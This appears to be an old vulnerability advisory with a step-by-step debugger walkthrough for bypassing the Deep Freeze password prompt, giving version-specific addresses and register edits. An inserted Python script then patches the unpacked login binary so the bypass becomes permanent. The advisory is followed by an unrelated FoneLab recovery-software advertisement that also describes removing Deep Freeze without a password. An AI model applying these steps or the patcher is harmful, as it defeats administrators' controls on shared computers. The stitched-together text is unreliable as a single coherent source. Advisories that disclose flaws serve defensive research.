Summary
"Deep Freeze makes computing environments easier to manage and maintain. Each restart eradicates all changes and resets the computer to its original state, right down to the last byte." This article describes a method to bypass Deep Freeze's authentication mechanism.
Credit: The information has been provided by Emiliano Torres.
The original article can be found at: http://usuarios.arnet.com.ar/fliamarconato/
Details
Vulnerable Systems:
* Deep Freeze versions 5.20.* and 5.30.*
* Deep Freeze versions 3.32.*
Immune Systems:
* DeepFreeze version 5.5
Tools needed:
OllyDbg to patch the program and run it.
OllyScript to run scripts in OllyDbg.
ASPack 2.12 OEP finder script by hacnho/VCT2k4 to find the OEP.
Process Explorer for 2K/XP to see the login program's command line.
DeASPack for ASPack 2.11 to unpack the login program (for Deep Freeze 3.32.000.0534 only).
Summary:
We are going to load a second instance of the Deep Freeze login program under a debugger and alter it so that it accepts any password as valid.
Let's get to work:
1. First we need some data that we will use later to launch our own instance of the login program. Open Process Explorer, which lists every process running on the PC; among them is the login program, called FrzState.exe or FrzState2k.exe. Find it in the list, expanding the tree if necessary, right-click its name and select 'Properties' from the context menu. A window with the process properties will open.
2. In the properties window you'll see a property called 'Command line'. This box shows the program's location; note it down. At the end of the box there are three numbers that you also have to write down for later. Once you have them you can close Process Explorer.
Deep Freeze for Windows 2K/XP
3. Now run OllyDbg. Note: make sure OllyScript is properly installed. There should be a menu called 'Plugins' containing a submenu called 'OllyScript'. If this menu doesn't appear, the plugin isn't installed properly: go to the 'Options' menu, select 'Appearance', enter the path where you copied the OllyScript files in the 'Plugin path' box, press OK and restart the program.
On the 'File' menu select 'Open' and look for the login program file (Process Explorer told you where it is). In the 'Arguments' box write the three numbers you noted. Now click 'Open'. If a warning message box shows up press 'OK', and if a later message box asks whether you want to continue the code analysis press 'No'.
4. The program is loaded, but it is packed with ASPack 2.12 and we can't see the real code. To solve this we use OllyScript and the ASPack 2.12 OEP finder script: go to the 'Plugins' menu, then the 'OllyScript' submenu, and select 'Run script'.
5. Locate the script and open it. The script will find the OEP (original entry point); dismiss any window that shows up. Note: we are now at the OEP. If you are an experienced user you can dump the program with OllyDump and analyze the code in a disassembler.
6. Deep Freeze can be configured to hide the system tray icon (next to the clock). If you can't see the Deep Freeze icon, follow the steps in the Annex and then resume this tutorial.
7. Right-click the code and in the context menu select 'Go to' and then 'Expression' (or use the shortcut Ctrl+G).
8. In the text box enter the following value according to the Deep Freeze version you have installed and press OK.
Version          Value
4.20.020.0598    40368D
4.20.120.0598    40368D
4.20.121.0613    4034F5
5.20.220.1125    4037E9
5.30.120.1181    4037E9
The program will jump to that line of code.
9. This is the line from which the password verification routine is called. Set a breakpoint here: right-click the line and in the context menu select 'Breakpoint' and then 'Toggle' (or press F2).
10. We are almost done! Now run this new Deep Freeze login program instance by pressing F9. If everything went right you should see two Deep Freeze icons in the system tray next to the clock. If Deep Freeze was configured to hide the icon (see the Annex), instead of two icons you'll see one empty icon.
Note: if the icon doesn't show up, you may have typed the three argument numbers incorrectly or opened the wrong file.
11. Now activate the login program by double-clicking the icon while holding the Shift key. If there are two icons, be sure to click the new one and not the old one. The login window will appear asking for the password. Type anything in the password box and press ENTER. The breakpoint set earlier in OllyDbg will trigger and the login program will freeze.
Note: if the breakpoint doesn't trigger, you may have chosen the wrong icon. Try the other one.
12. In OllyDbg press F8 to step over the function call. In the registers window (to the right of the code) you'll see that EAX holds 00000000: the check returned "incorrect password". Let's change that. Double-click the EAX value to open the modification window, write 1 in the 'Hexadecimal' box and press OK.
13. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.
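Why step 12 works, as an added illustration that is not code from the original article or from Faronics: the verification routine computes a yes/no verdict, hands it back in EAX, and the caller at the table address trusts that single value, so anyone who can rewrite EAX (or the flag it is derived from) is in. The Python below models that pattern and, for contrast, one common hardening in which the password is key material that must decrypt and authenticate the protected settings rather than a verdict to be tested. The hardened pattern is a hypothetical design shown for comparison, not a description of how Deep Freeze 5.5 fixed the issue; the password, settings marker and HMAC-counter stream cipher are constructed for the example.

```python
# Added illustration, not Deep Freeze code. Pattern A is the shape the tutorial
# attacks (a verdict the caller trusts); pattern B is a hypothetical hardening
# in which the password is key material, shown for contrast only.
import hashlib
import hmac
import os
from typing import Optional

# ---- Pattern A: boolean verdict --------------------------------------------
STORED_DIGEST = hashlib.sha256(b"correct horse").digest()   # constructed secret


def check_password(pw: bytes) -> int:
    """Returns 1 for a match, 0 otherwise: the EAX value seen in step 12."""
    return int(hmac.compare_digest(hashlib.sha256(pw).digest(), STORED_DIGEST))


def login_boolean(pw: bytes, forced_ok: bool = False) -> bool:
    """The caller only tests the verdict; forced_ok models 'EAX := 1' / 'ZF := 0'."""
    verdict = check_password(pw)
    if forced_ok:
        verdict = 1
    return verdict == 1

# ---- Pattern B: password-derived key must open the settings ----------------
MAGIC = b"DFCFG1;"   # constructed marker that only the right key reproduces


def derive_key(pw: bytes, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", pw, salt, 50_000, dklen=32)


def _keystream(key: bytes, n: int) -> bytes:
    """HMAC-SHA256 in counter mode: a stdlib-only stream cipher for the example."""
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, ctr.to_bytes(4, "big"), "sha256").digest()
        ctr += 1
    return out[:n]


def _xor(data: bytes, ks: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, ks))


def seal_config(pw: bytes, settings: bytes) -> bytes:
    """Encrypt-then-MAC the settings under a key derived from the password."""
    salt = os.urandom(16)
    key = derive_key(pw, salt)
    ct = _xor(MAGIC + settings, _keystream(key, len(MAGIC) + len(settings)))
    tag = hmac.new(key, salt + ct, "sha256").digest()
    return salt + tag + ct


def open_config(pw: bytes, blob: bytes, forced_ok: bool = False) -> Optional[bytes]:
    """Returns the settings, or None. Forcing the verdict no longer helps."""
    salt, tag, ct = blob[:16], blob[16:48], blob[48:]
    key = derive_key(pw, salt)
    verdict = hmac.compare_digest(hmac.new(key, salt + ct, "sha256").digest(), tag)
    if forced_ok:
        verdict = True                 # the attacker rewrites the verdict...
    if not verdict:
        return None
    plain = _xor(ct, _keystream(key, len(ct)))
    # ...but the wrong key yields noise, so the MAGIC check still fails.
    return plain[len(MAGIC):] if plain.startswith(MAGIC) else None
```

Forcing the verdict in pattern A grants access with any password, which is exactly what the EAX edit above does. Forcing it in pattern B only produces a ciphertext decrypted under the wrong key, which fails the marker check, so the attacker still needs the real password; the binary never holds the key.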
Deep Freeze 5.20.250.1125 and 5.30.150.1181 (Windows 9X):
3. Now we're going to kill the login program. If you simply close it, the process reappears in the list. To close it for good, first kill the process called MSGSRV32.EXE: find it in the list, right-click it and select 'Kill Process', answering Yes to any confirmation. Next, right-click the process FrzState9X.exe and select 'Kill Process' again. Now the login program should be dead. Note: if the Deep Freeze icon still remains in the system tray next to the clock, hover the mouse cursor over it to make it disappear.
4. Now run OllyDbg. Note: make sure OllyScript is properly installed. There should be a menu called 'Plugins' containing a submenu called 'OllyScript'. If this menu doesn't appear, the plugin isn't installed properly: go to the 'Options' menu, select 'Appearance', enter the path where you copied the OllyScript files in the 'Plugin path' box, press OK and restart the program. On the 'File' menu select 'Open', look for the login program file (Process Explorer told you where it is) and click 'Open'. If a warning message box shows up press 'OK', and if a later message box asks whether you want to continue the code analysis press 'No'.
5. The program is loaded, but it is packed with ASPack 2.12 and we can't see the real code. To solve this we use OllyScript and the ASPack 2.12 OEP finder script: go to the 'Plugins' menu, then the 'OllyScript' submenu, and select 'Run script'.
6. Locate the script and open it. The script will find the OEP (original entry point); dismiss any window that shows up. Note: we are now at the OEP. If you are an experienced user you can dump the program with OllyDump and analyze the code in a disassembler.
7. Right-click the code and in the context menu select 'Go to' and then 'Expression' (or use the shortcut Ctrl+G).
8. In the text box enter the following value according to the Deep Freeze version you have installed and press OK.
Version          Value
5.20.250.1125    408D34
5.30.150.1181    408E08
The program will jump to that line of code.
9. At this line the program decides whether the password is correct. Set a breakpoint here: right-click the line and in the context menu select 'Breakpoint' and then 'Toggle' (or press F2).
10. We are almost done! Now run this new Deep Freeze login program instance by pressing F9. If Deep Freeze is configured to show the icon, you'll now see it in the system tray next to the clock.
11. Now activate the login program by double-clicking the icon while holding the Shift key, or by pressing CTRL+ALT+SHIFT+F6. The login window will appear asking for the password. Type anything in the password box and press ENTER. The breakpoint set earlier in OllyDbg will trigger and the login program will freeze.
12. In the registers window (to the right of the code) you'll see that the Z flag is 1, meaning the password was judged incorrect. Let's change that: double-click the Z flag value and it changes to 0.
13. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.
Deep Freeze 3.32.000.0534 (Windows 9X):
3. Now we're going to kill the login program. If you simply close it, the process reappears in the list. To close it for good, first kill the process called MSGSRV32.EXE: find it in the list, right-click it and select 'Kill Process', answering Yes to any confirmation. Next, right-click the process FrzState.exe and select 'Kill Process' again. Now the login program should be dead. Note: if the Deep Freeze icon still remains in the system tray next to the clock, hover the mouse cursor over it to make it disappear.
4. This version of Deep Freeze is packed with ASPack 2.11, so before we can work with the login program we have to unpack the file, using DeASPack. Run DeASPack; a dialog box asks you to select a file to unpack. Look for the login program file (Process Explorer told you where it is) and click 'Open'. The program unpacks the file and the dialog box closes.
5. Now run OllyDbg. On the 'File' menu select 'Open' and look for the unpacked file, called out.exe, in the same folder as the login program. Then click 'Open'.
6. When OllyDbg finishes analyzing the program, right-click the code and in the context menu select 'Go to' and then 'Expression' (or use the shortcut Ctrl+G).
7. In the text box enter 417410 and press OK. The program will jump to that line of code.
8. At this line the program decides whether the password is correct. Set a breakpoint here: right-click the line and in the context menu select 'Breakpoint' and then 'Toggle' (or press F2).
9. We are almost done! Now run this new Deep Freeze login program instance by pressing F9. If Deep Freeze is configured to show the icon, you'll now see it in the system tray next to the clock.
10. Now activate the login program by double-clicking the icon while holding the Shift key, or by pressing CTRL+ALT+SHIFT+F6. The login window will appear asking for the password. Type anything in the password box and press ENTER. The breakpoint set earlier in OllyDbg will trigger and the login program will freeze.
11. In the registers window (to the right of the code) you'll see that the Z flag is 1, meaning the password was judged incorrect. Let's change that: double-click the Z flag value and it changes to 0.
12. Now press F9 to continue. If everything went right the Deep Freeze configuration dialog will show up.
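Making the change permanent, as an added example that is not part of the original article: the three walkthroughs above rewrite EAX or the Z flag by hand every time the login program runs, while the tools list says OllyDbg is used "to patch the program". The same effect can be written into the unpacked image on disk, and the script below does that under stated assumptions that the page does not confirm: that the 2K/XP table addresses point at a 5-byte call rel32 (opcode E8), which is replaced by the equally long mov eax,1; that the 9X addresses point at a short jz/jnz (opcode 74/75), which is NOPed out or made unconditional; and that the file being patched is the unpacked login program (DeASPack's out.exe or an OllyDump dump), since the packed file holds compressed bytes at those addresses. The PE32 skeleton and the bytes at the sample address are constructed so the script runs offline. Check the real instruction in OllyDbg before applying it to a dump; the script refuses to touch any other opcode.

```python
# Added example, not from the original advisory. Patches the unpacked login
# program so the password check always reports success. Assumptions: the 2K/XP
# table VAs point at 'call rel32' (E8); the 9X VAs point at a short jz/jnz
# (74/75); the input is an unpacked PE32 image (out.exe / OllyDump dump).
from typing import List, Optional, Tuple

Section = Tuple[int, int, int]  # (VirtualAddress, SizeOfRawData, PointerToRawData)


def parse_pe32(pe: bytes) -> Tuple[int, List[Section]]:
    """Return (ImageBase, section table) from a PE32 header."""
    e_lfanew = int.from_bytes(pe[0x3C:0x40], "little")
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    nsec = int.from_bytes(pe[coff + 2:coff + 4], "little")
    opt_size = int.from_bytes(pe[coff + 16:coff + 18], "little")
    opt = coff + 20
    if int.from_bytes(pe[opt:opt + 2], "little") != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled")
    image_base = int.from_bytes(pe[opt + 28:opt + 32], "little")
    sections = []
    for i in range(nsec):
        h = pe[opt + opt_size + 40 * i:opt + opt_size + 40 * (i + 1)]
        sections.append((int.from_bytes(h[12:16], "little"),
                         int.from_bytes(h[16:20], "little"),
                         int.from_bytes(h[20:24], "little")))
    return image_base, sections


def va_to_offset(va: int, image_base: int, sections: List[Section]) -> Optional[int]:
    """Map a debugger VA (e.g. 0x40368D) to a file offset, or None if unbacked."""
    rva = va - image_base
    for vaddr, raw_size, raw_ptr in sections:
        if vaddr <= rva < vaddr + raw_size:
            return raw_ptr + (rva - vaddr)
    return None


def patch_call_to_mov_eax_1(code: bytearray, off: int) -> None:
    """2K/XP variant: 'call check' (5 bytes) becomes 'mov eax,1' (5 bytes)."""
    if code[off] != 0xE8:
        raise ValueError(f"expected call rel32 (E8) at {off:#x}, found {code[off]:#04x}")
    code[off:off + 5] = b"\xB8\x01\x00\x00\x00"


def force_branch(code: bytearray, off: int) -> str:
    """9X variant: ZF=1 means wrong password, so defeat the jz or promote the jnz."""
    op = code[off]
    if op == 0x74:                       # jz fail  -> never taken
        code[off:off + 2] = b"\x90\x90"
        return "jz -> nop nop"
    if op == 0x75:                       # jnz ok   -> always taken
        code[off] = 0xEB
        return "jnz -> jmp short"
    raise ValueError(f"expected jz/jnz short (74/75) at {off:#x}, found {op:#04x}")


def patch_image(pe: bytearray, va: int, mode: str) -> int:
    """Patch the instruction at VA in place; returns the file offset touched."""
    image_base, sections = parse_pe32(pe)
    off = va_to_offset(va, image_base, sections)
    if off is None:
        raise ValueError(f"VA {va:#x} is not backed by raw data (still packed?)")
    if mode == "call":
        patch_call_to_mov_eax_1(pe, off)
    elif mode == "branch":
        force_branch(pe, off)
    else:
        raise ValueError(f"unknown mode {mode!r}")
    return off


def build_sample_pe(image_base: int, sec_va: int, raw_ptr: int, raw_size: int) -> bytearray:
    """Constructed PE32 skeleton (headers + one zero-filled section) for offline runs."""
    pe = bytearray(raw_ptr + raw_size)
    pe[0:2] = b"MZ"
    pe[0x3C:0x40] = (0x40).to_bytes(4, "little")
    pe[0x40:0x44] = b"PE\0\0"
    coff, opt = 0x44, 0x58
    pe[coff + 2:coff + 4] = (1).to_bytes(2, "little")        # NumberOfSections
    pe[coff + 16:coff + 18] = (0xE0).to_bytes(2, "little")   # SizeOfOptionalHeader
    pe[opt:opt + 2] = (0x10B).to_bytes(2, "little")           # PE32 magic
    pe[opt + 28:opt + 32] = image_base.to_bytes(4, "little")
    sec = opt + 0xE0
    pe[sec:sec + 5] = b".text"
    pe[sec + 12:sec + 16] = sec_va.to_bytes(4, "little")
    pe[sec + 16:sec + 20] = raw_size.to_bytes(4, "little")
    pe[sec + 20:sec + 24] = raw_ptr.to_bytes(4, "little")
    return pe


if __name__ == "__main__":
    # Constructed: pretend the 5.20.220.1125 call site (VA 0x40368D) holds a call.
    img = build_sample_pe(0x400000, 0x1000, 0x400, 0x3000)
    off = va_to_offset(0x40368D, 0x400000, [(0x1000, 0x3000, 0x400)])
    img[off:off + 5] = b"\xE8\x10\x00\x00\x00"
    print(f"patched file offset {patch_image(img, 0x40368D, 'call'):#x}")
```

On a real dump, read the file into a bytearray, call patch_image with the VA from the version table and "call" or "branch" as appropriate, and write the result to a new file. Using mov eax,1 in place of the call is what makes the 2K/XP patch safe: it occupies exactly the five bytes of call rel32, so no surrounding instruction shifts and the stack stays balanced.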
Vendor Response:
"Faronics takes the security of our products very seriously and we began working on resolution to the password security issue as soon as we were made aware of it. We are happy to report that the issue was resolved on June 12, 2005 with a new Deep Freeze 5.5 release of the Standard, Professional, and Enterprise versions. In fact, the issue was already resolved before it was posted on the SecuriTeam site. We have already made all of our customers aware that the new version is available. If you are a Deep Freeze customer and have not received notification, you can request an update using the form at: http://www.faronics.com/html/updates.asp
It is important to note that the method described must be used on each workstation individually and the perpetrator would require physical access to the workstation; it will not work over a network.
It requires an industrious, knowledgeable user who can find, download, and use the utilities that are referred to in the tutorial. Even then, the procedure must be followed to the letter and will not work in all cases. In cases where it does work, the user has essentially fooled Deep Freeze into believing that a correct password has been entered on that one individual workstation. The user could then tell Deep Freeze to boot Thawed and would therefore be able to make a permanent change to that single computer. This has been resolved with the 5.5 release and the method will no longer function."
If you have ever wanted to hold a system in a known state, keeping it secure and allowing no lasting changes, you might want to try deep freezing your Windows computer. Unlike a factory reset, which wipes everything back to the manufacturer's defaults, a deep freeze lets you define a specific system state that your computer restores to on every restart.
If you use Deep Freeze, or have lost files to it in the scenario described above, don't worry: there is a way to recover files lost after Deep Freeze runs, using FoneLab Data Retriever.
1. What is Deep Freeze?
Deep Freeze is a software driver that safeguards the hard drive by redirecting data that would be written to the disk. With Deep Freeze you can grant unrestricted access to a system while ensuring that any changes made through normal use, such as installing unauthorized programs, changing the configuration or unintentionally installing malware and viruses, are discarded at the next restart.
When you restart a computer on which Deep Freeze is installed, it removes all changes made to the system since the last restart. It also removes any data files saved on the local hard disk, i.e. on your Windows C: drive. So if you want changes to persist across a restart, you have to disable Deep Freeze first and re-enable it afterwards.
2. Recovering Lost Files after Deep Freeze
If you didn't do so in time and lost your data, don't worry: you can recover data deleted after running Deep Freeze with FoneLab Data Retriever.
FoneLab Data Retriever is recommended for restoring files lost to Deep Freeze in a few simple steps. It recovers lost data in its original form, operating in read-only mode: it reads the required data and copies it to the location you choose.
Download the FoneLab Data Retriever and install it.
Launch FoneLab Data Retriever. Choose the file type and location, then click Scan.
The software quickly scans the selected location for lost data. After the Quick Scan, the results are shown in the interface. If you can't find your lost files, try Deep Scan, which takes longer.
Check the results in each section for the data that was erased, select the files you want and click Recover to get the lost files back.
3. Uninstalling Deep Freeze: Detailed Steps
Operation 1: Uninstall Deep Freeze with the password
Disable Deep Freeze before uninstalling:
- Hold the Shift key and double-click the Deep Freeze icon to open Deep Freeze Standard.
- Enter your password, select Boot Thawed.
- Restart your computer and boot it in normal mode. If this succeeded, the Deep Freeze icon will be marked with an X, meaning Deep Freeze is disabled.
- Find the installation file and uninstall Deep Freeze using its installer.
Operation 2: Uninstall Deep Freeze without the password
If the password has been forgotten or is unknown, there is a workaround: boot Windows into debugging mode, use Task Manager to kill the process associated with Deep Freeze, then restart and boot normally.
- Restart your computer.
- Press DEL, F10 or F2 while the computer starts up to enter the BIOS (CMOS) setup.
- Advance the date by 10 years, save, and restart your computer.
- Before the Windows logo shows up, press F8.
- When prompted, choose Debug mode (Debugging Mode).
- In Debug mode, select the operating system you use (for example Windows XP Pro).
- When Windows starts, wait for the welcome screen and press CTRL+ALT+DEL as soon as the desktop appears.
- End the 'DFServ' process.
- Find the Deep Freeze files and delete them.
Deep Freeze addresses the usual worries of malware, slowdowns, file congestion, unauthorized applications and hard drive degradation, but its reset-on-restart behaviour can also wipe important files, so keep a backup copy of anything you need.
Conclusion
Whether you want to protect a single computer or a whole bank of them, deep freezing a system can be very useful. You no longer have to worry about anything troubling your system: simply restart and the changes are gone!
You don't have to use these programs permanently either. For example, when you let someone else play around on your system, you can enable the utility beforehand to preserve your preferred state.
In addition to restoring lost files, this software can recover images, videos, audio, emails and other file types from hard drives, computers, flash drives, digital cameras and more.
The tool does not upload any of the recovered data to its server. Whatever the cause of the data loss, you can download the software and try it out.